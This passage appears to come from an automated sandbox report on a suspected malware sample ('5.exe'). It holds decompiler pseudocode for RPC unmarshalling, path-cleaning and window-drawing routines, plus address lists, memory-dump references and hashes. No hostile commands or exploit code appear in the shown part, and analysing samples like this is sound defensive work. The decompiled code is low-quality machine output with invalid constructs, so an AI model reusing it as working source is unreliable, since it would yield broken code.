                                                                                              									__edx =  *(__ebp - 0x24);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__edx =  *__ecx;
                                                                                              									_push( *__ecx);
                                                                                              									_push("int3264=%ld => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xf:
                                                                                              									L11:
                                                                                              									__ecx = __ebp - 0x28;
                                                                                              									__edx =  *(__ebp + 8);
                                                                                              									E6F1DAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp - 0x28);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *( *(__ebp + 0xc));
                                                                                              									_push(__ecx);
                                                                                              									_push("uint3264=%ld => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0x10:
                                                                                              									goto L46;
                                                                                              							}
                                                                                              						}
                                                                                              						return  *(_t219 + 0xc);
                                                                                              					}
                                                                                              				}
                                                                                              			}






                                                                                              0x6f1d973b
                                                                                              0x6f1d973c
                                                                                              0x6f1d973f
                                                                                              0x6f1d9743
                                                                                              0x6f1d9746
                                                                                              0x6f1d974b
                                                                                              0x6f1d9750
                                                                                              0x6f1d9755
                                                                                              0x6f1d9758
                                                                                              0x6f1d975b
                                                                                              0x6f1d975e
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9766
                                                                                              0x6f1d9768
                                                                                              0x6f1d9770
                                                                                              0x6f1d9778
                                                                                              0x6f1d977b
                                                                                              0x6f1d977c
                                                                                              0x6f1d977f
                                                                                              0x6f1d9782
                                                                                              0x6f1d9783
                                                                                              0x6f1d9785
                                                                                              0x6f1d9786
                                                                                              0x6f1d978b
                                                                                              0x6f1d978e
                                                                                              0x6f1d978f
                                                                                              0x6f1d9794
                                                                                              0x6f1d9799
                                                                                              0x6f1d979f
                                                                                              0x6f1d97a2
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d97aa
                                                                                              0x6f1d97ac
                                                                                              0x6f1d97b0
                                                                                              0x6f1d97b4
                                                                                              0x6f1d97bc
                                                                                              0x6f1d97bf
                                                                                              0x6f1d97c0
                                                                                              0x6f1d97c3
                                                                                              0x6f1d97c6
                                                                                              0x6f1d97ca
                                                                                              0x6f1d97cf
                                                                                              0x6f1d97d4
                                                                                              0x6f1d97d9
                                                                                              0x6f1d97dc
                                                                                              0x6f1d97df
                                                                                              0x6f1d97e2
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d961b
                                                                                              0x6f1d961d
                                                                                              0x6f1d9625
                                                                                              0x6f1d962d
                                                                                              0x6f1d9631
                                                                                              0x6f1d9634
                                                                                              0x6f1d9636
                                                                                              0x6f1d9639
                                                                                              0x6f1d963a
                                                                                              0x6f1d963d
                                                                                              0x6f1d963f
                                                                                              0x6f1d9640
                                                                                              0x6f1d9645
                                                                                              0x6f1d964a
                                                                                              0x6f1d964d
                                                                                              0x6f1d9656
                                                                                              0x6f1d9658
                                                                                              0x6f1d965d
                                                                                              0x6f1d965d
                                                                                              0x6f1d9663
                                                                                              0x6f1d9663
                                                                                              0x6f1d9666
                                                                                              0x6f1d9669
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97f1
                                                                                              0x6f1d97f4
                                                                                              0x6f1d97f5
                                                                                              0x6f1d97fa
                                                                                              0x6f1d97ff
                                                                                              0x6f1d9802
                                                                                              0x6f1d9805
                                                                                              0x6f1d980b
                                                                                              0x6f1d980d
                                                                                              0x6f1d9810
                                                                                              0x6f1d9810
                                                                                              0x6f1d9813
                                                                                              0x6f1d9816
                                                                                              0x6f1d981c
                                                                                              0x6f1d9823
                                                                                              0x6f1d9827
                                                                                              0x6f1d982c
                                                                                              0x6f1d982f
                                                                                              0x6f1d9832
                                                                                              0x6f1d9835
                                                                                              0x6f1d9838
                                                                                              0x6f1d983f
                                                                                              0x6f1d9860
                                                                                              0x6f1d9863
                                                                                              0x6f1d9869
                                                                                              0x6f1d9871
                                                                                              0x6f1d9876
                                                                                              0x6f1d9841
                                                                                              0x6f1d9841
                                                                                              0x6f1d9844
                                                                                              0x6f1d9847
                                                                                              0x6f1d984a
                                                                                              0x6f1d984d
                                                                                              0x6f1d9850
                                                                                              0x6f1d9857
                                                                                              0x6f1d9857
                                                                                              0x6f1d9879
                                                                                              0x6f1d987e
                                                                                              0x6f1d9882
                                                                                              0x6f1d9885
                                                                                              0x6f1d9888
                                                                                              0x6f1d988c
                                                                                              0x6f1d9890
                                                                                              0x6f1d9894
                                                                                              0x6f1d98a0
                                                                                              0x6f1d9935
                                                                                              0x6f1d9935
                                                                                              0x6f1d9938
                                                                                              0x6f1d993e
                                                                                              0x6f1d994e
                                                                                              0x6f1d9951
                                                                                              0x6f1d9940
                                                                                              0x6f1d9940
                                                                                              0x6f1d9943
                                                                                              0x6f1d9946
                                                                                              0x6f1d9946
                                                                                              0x6f1d9957
                                                                                              0x6f1d995a
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a9
                                                                                              0x6f1d98ac
                                                                                              0x6f1d98ad
                                                                                              0x6f1d98b0
                                                                                              0x6f1d98b2
                                                                                              0x6f1d98b8
                                                                                              0x6f1d98bb
                                                                                              0x6f1d98bc
                                                                                              0x6f1d98c1
                                                                                              0x6f1d98c6
                                                                                              0x6f1d98c9
                                                                                              0x6f1d98cc
                                                                                              0x6f1d98ce
                                                                                              0x6f1d98d1
                                                                                              0x6f1d98d4
                                                                                              0x6f1d98d7
                                                                                              0x6f1d98dd
                                                                                              0x6f1d98df
                                                                                              0x6f1d98e2
                                                                                              0x6f1d98e4
                                                                                              0x6f1d98e7
                                                                                              0x6f1d98ea
                                                                                              0x6f1d98ed
                                                                                              0x6f1d98f3
                                                                                              0x6f1d98f5
                                                                                              0x6f1d98f6
                                                                                              0x6f1d98fb
                                                                                              0x6f1d9900
                                                                                              0x6f1d9900
                                                                                              0x6f1d9903
                                                                                              0x6f1d9903
                                                                                              0x6f1d9907
                                                                                              0x6f1d990a
                                                                                              0x6f1d990d
                                                                                              0x6f1d9910
                                                                                              0x6f1d9913
                                                                                              0x6f1d9916
                                                                                              0x6f1d9919
                                                                                              0x6f1d991c
                                                                                              0x6f1d991f
                                                                                              0x6f1d9925
                                                                                              0x6f1d9929
                                                                                              0x6f1d992d
                                                                                              0x6f1d9932
                                                                                              0x00000000
                                                                                              0x6f1d9925
                                                                                              0x00000000
                                                                                              0x6f1d9962
                                                                                              0x6f1d9964
                                                                                              0x6f1d9968
                                                                                              0x6f1d996c
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9979
                                                                                              0x6f1d997b
                                                                                              0x6f1d997f
                                                                                              0x6f1d9983
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9990
                                                                                              0x6f1d9992
                                                                                              0x6f1d999a
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d99d4
                                                                                              0x6f1d99d9
                                                                                              0x6f1d99dc
                                                                                              0x6f1d99e3
                                                                                              0x6f1d99e6
                                                                                              0x6f1d99ec
                                                                                              0x6f1d99ef
                                                                                              0x6f1d99f2
                                                                                              0x6f1d99f8
                                                                                              0x6f1d99fb
                                                                                              0x6f1d99fe
                                                                                              0x6f1d9a02
                                                                                              0x6f1d9a0e
                                                                                              0x6f1d9a11
                                                                                              0x6f1d9a14
                                                                                              0x6f1d9a15
                                                                                              0x6f1d9a18
                                                                                              0x6f1d9a19
                                                                                              0x6f1d9a1e
                                                                                              0x6f1d9a23
                                                                                              0x6f1d9a26
                                                                                              0x6f1d9a2c
                                                                                              0x6f1d9a2e
                                                                                              0x6f1d9a34
                                                                                              0x6f1d9a38
                                                                                              0x6f1d9a3d

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                              • API String ID: 2102423945-1168472477
                                                                                              • Opcode ID: b374cf573ca7c8aada9babcb2ebfcdd45b4dc71a7a78e6d56898129529a50668
                                                                                              • Instruction ID: 1906c049e510a06eb3321f8453d286d876534ff0f1bdd2ca351cac78b003d296
                                                                                              • Opcode Fuzzy Hash: b374cf573ca7c8aada9babcb2ebfcdd45b4dc71a7a78e6d56898129529a50668
                                                                                              • Instruction Fuzzy Hash: 77C11CB5A00209AFCB08CF58D9A0EAE77B5EF89354F44C159F9194F349D731EA60CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D3840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				char _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr* _t124;
                                                                                              				void* _t126;
                                                                                              				intOrPtr _t129;
                                                                                              				void* _t134;
                                                                                              				void* _t198;
                                                                                              				void* _t199;
                                                                                              				void* _t200;
                                                                                              				void* _t201;
                                                                                              				void* _t204;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t201 = _t200 + 0x14;
                                                                                              				_a12 = _a12 + 6;
                                                                                              				if(( *_v8 & 0x000000ff) == 0x19) {
                                                                                              					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                              					_v28 = E6F1DD650( *_v12 & 0x000000ff, _a4, _v12);
                                                                                              					E6F1D73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					0x6f1d0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                              					_t204 = _t201 + 0x1c;
                                                                                              					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						_a16 = 1;
                                                                                              					}
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						_v32 = (_v8[2] & 0x0000ffff) + _v28;
                                                                                              						_t129 = E6F1DA3B0(_v32, _a4, _v32);
                                                                                              						_t204 = _t204 + 8;
                                                                                              						 *_a8 = _t129;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F1DAF00(_a4, _v8[2] & 0x0000ffff);
                                                                                              					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                              					_v20 = E6F1DD830(_t134, _t198, _t199,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
                                                                                              					_v40 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					E6F1DAF00(_a4, _v20);
                                                                                              					E6F1DC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					E6F1E00E0( *_a8, _v16, _v8[2] & 0x0000ffff);
                                                                                              					0x6f1d0000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
                                                                                              					E6F1E00E0( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
                                                                                              					if(( *_v12 & 0x000000ff) != 0x22) {
                                                                                              						if(( *_v12 & 0x000000ff) == 0x25) {
                                                                                              							_t124 = _a8;
                                                                                              							0x6f1d0000((_v8[2] & 0x0000ffff) +  *_t124);
                                                                                              							0x6f1d0000("string=%s\n", _t124);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                              						0x6f1d0000(_t126);
                                                                                              						0x6f1d0000("string=%s\n", _t126);
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              				0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              				 *0x6f1d0000(0x6e6);
                                                                                              				return 0;
                                                                                              			}






















                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                              • API String ID: 0-4074488482
                                                                                              • Opcode ID: 36cf44a2a641a78deb6f03fc308b9c1345786865dfbf2bfe468795c97b6ba953
                                                                                              • Instruction ID: a3ae1d431a037ff93f394ae6484eed4616c7db4af07049cf03b9787e8609c3ab
                                                                                              • Opcode Fuzzy Hash: 36cf44a2a641a78deb6f03fc308b9c1345786865dfbf2bfe468795c97b6ba953
                                                                                              • Instruction Fuzzy Hash: 178161B5A00214AFCB04CF98D891EAEB7F5AF88345F14C198F8499B345D735EE61DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 29%
                                                                                              			E6F1D3600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				signed char* _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _t94;
                                                                                              				intOrPtr _t98;
                                                                                              				signed int _t115;
                                                                                              				signed char* _t135;
                                                                                              				signed char* _t163;
                                                                                              				void* _t181;
                                                                                              				void* _t182;
                                                                                              				void* _t186;
                                                                                              				void* _t187;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t182 = _t181 + 0x14;
                                                                                              				_a12 = _a12 + 6;
                                                                                              				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_v16 =  &(_v8[_v8[4] + 4]);
                                                                                              				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
                                                                                              				if(__eflags == 0) {
                                                                                              					_v24 = _v16[2] & 0x0000ffff;
                                                                                              					_v16 = E6F1DA460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
                                                                                              					E6F1D73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					0x6f1d0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                              					_t94 = E6F1DAEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
                                                                                              					_t186 = _t182 + 0x20;
                                                                                              					_v12 = _t94;
                                                                                              					_t163 = _v8;
                                                                                              					_t135 = _v8;
                                                                                              					__eflags = ( *(_t163 + 2) & 0x0000ffff) + _v12 - ( *(_t135 + 2) & 0x0000ffff);
                                                                                              					if(( *(_t163 + 2) & 0x0000ffff) + _v12 < ( *(_t135 + 2) & 0x0000ffff)) {
                                                                                              						0x6f1d0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
                                                                                              						_t186 = _t186 + 0xc;
                                                                                              						 *0x6f1d0000(0x6f7);
                                                                                              					}
                                                                                              					__eflags = _a16 & 0x000000ff;
                                                                                              					if((_a16 & 0x000000ff) == 0) {
                                                                                              						_t98 = _a4;
                                                                                              						__eflags =  *(_t98 + 0x20) & 0x000000ff;
                                                                                              						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
                                                                                              							__eflags =  *_a8;
                                                                                              							if( *_a8 == 0) {
                                                                                              								 *_a8 =  *(_a4 + 4);
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v28 = (_v8[2] & 0x0000ffff) + _v12;
                                                                                              						_t115 = E6F1DA3B0(_a4, _a4, _v28);
                                                                                              						_t186 = _t186 + 8;
                                                                                              						 *_a8 = _t115;
                                                                                              					}
                                                                                              					 *(_a4 + 0x10) =  *(_a4 + 4);
                                                                                              					_v20 =  *(_a4 + 0x10);
                                                                                              					E6F1DAF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
                                                                                              					_t187 = _t186 + 8;
                                                                                              					__eflags = ( *_v8 & 0x000000ff) - 0x18;
                                                                                              					if(( *_v8 & 0x000000ff) == 0x18) {
                                                                                              						E6F1DC2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              						_t187 = _t187 + 0x14;
                                                                                              					}
                                                                                              					0x6f1d0000("copying %p to %p\n", _v20,  *_a8);
                                                                                              					__eflags =  *_a8 - _v20;
                                                                                              					if( *_a8 != _v20) {
                                                                                              						__eflags = (_v8[2] & 0x0000ffff) + _v12;
                                                                                              						E6F1E00E0( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
                                                                                              					}
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f1d0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}


















                                                                                              Strings
                                                                                              • invalid format type %x, xrefs: 6F1D3650
                                                                                              • invalid array format type %x, xrefs: 6F1D3692
                                                                                              • copying %p to %p, xrefs: 6F1D37F9
                                                                                              • integer overflow of memory_size %u with bufsize %u, xrefs: 6F1D3737
                                                                                              • (%p, %p, %p, %d), xrefs: 6F1D361D
                                                                                              • memory_size = %d, xrefs: 6F1D36F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                              • API String ID: 0-1713900660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E6F1D8850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
                                                                                              				intOrPtr* _v8;
                                                                                              				char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed char* _t49;
                                                                                              				signed char* _t76;
                                                                                              				void* _t87;
                                                                                              				void* _t88;
                                                                                              
                                                                                              				if((_a16 & 0x000000ff) == 0) {
                                                                                              					_v12 = "FALSE";
                                                                                              				} else {
                                                                                              					_v12 = "TRUE";
                                                                                              				}
                                                                                              				0x6f1d0000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
                                                                                              				_t88 = _t87 + 0x14;
                                                                                              				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					_t88 = _t88 + 8;
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              				}
                                                                                              				0x6f1d0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                              				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                              					_v16 = E6F1D4BC0(__eflags, _a4, _a12);
                                                                                              					_t76 = _a12;
                                                                                              					__eflags =  *(_t76 + (1 << 0)) & 0x80;
                                                                                              					if(( *(_t76 + (1 << 0)) & 0x80) == 0) {
                                                                                              						 *_a8 =  *((intOrPtr*)(_v16 + 8));
                                                                                              					} else {
                                                                                              						 *_a8 = _v16 + 8;
                                                                                              					}
                                                                                              				} else {
                                                                                              					if((_a12[1] & 0x80) == 0) {
                                                                                              						_v8 = _a8;
                                                                                              					} else {
                                                                                              						_v8 =  *_a8;
                                                                                              					}
                                                                                              					_t49 = _a12;
                                                                                              					_t94 = (_t49[1] & 0x60) - 0x20;
                                                                                              					if((_t49[1] & 0x60) == 0x20) {
                                                                                              						 *_v8 = 0;
                                                                                              					}
                                                                                              					E6F1D49D0(_t94, _a4, _v8,  *((intOrPtr*)( *_a4)));
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • _NdrClientContextUnmarshall@12.RGSBZEOG(?,?,00000001), ref: 6F1D8934
                                                                                              • _NdrServerContextNewUnmarshall@8.RGSBZEOG(?,?), ref: 6F1D8943
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Context$ClientServerUnmarshall@12Unmarshall@8
                                                                                              • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                              • API String ID: 4170269409-3585304320
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405B89(CHAR* _a4) {
                                                                                              				char _t5;
                                                                                              				char _t7;
                                                                                              				char* _t15;
                                                                                              				char* _t16;
                                                                                              				CHAR* _t17;
                                                                                              
                                                                                              				_t17 = _a4;
                                                                                              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                              					_t17 =  &(_t17[4]);
                                                                                              				}
                                                                                              				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                                                                                              					_t17 =  &(_t17[2]);
                                                                                              				}
                                                                                              				_t5 =  *_t17;
                                                                                              				_t15 = _t17;
                                                                                              				_t16 = _t17;
                                                                                              				if(_t5 != 0) {
                                                                                              					do {
                                                                                              						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                                                                                              							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                              							_t16 = CharNextA(_t16);
                                                                                              						}
                                                                                              						_t17 = CharNextA(_t17);
                                                                                              						_t5 =  *_t17;
                                                                                              					} while (_t5 != 0);
                                                                                              				}
                                                                                              				 *_t16 =  *_t16 & 0x00000000;
                                                                                              				while(1) {
                                                                                              					_t16 = CharPrevA(_t15, _t16);
                                                                                              					_t7 =  *_t16;
                                                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                              						break;
                                                                                              					}
                                                                                              					 *_t16 =  *_t16 & 0x00000000;
                                                                                              					if(_t15 < _t16) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				return _t7;
                                                                                              			}









                                                                                              APIs
                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-1471166050
                                                                                              • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                              • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                                                                              • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                              • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                              				struct tagLOGBRUSH _v16;
                                                                                              				long _t35;
                                                                                              				long _t37;
                                                                                              				void* _t40;
                                                                                              				long* _t49;
                                                                                              
                                                                                              				if(_a4 + 0xfffffecd > 5) {
                                                                                              					L15:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                              				if(_t49 == 0) {
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t35 =  *_t49;
                                                                                              				if((_t49[5] & 0x00000002) != 0) {
                                                                                              					_t35 = GetSysColor(_t35);
                                                                                              				}
                                                                                              				if((_t49[5] & 0x00000001) != 0) {
                                                                                              					SetTextColor(_a8, _t35);
                                                                                              				}
                                                                                              				SetBkMode(_a8, _t49[4]);
                                                                                              				_t37 = _t49[1];
                                                                                              				_v16.lbColor = _t37;
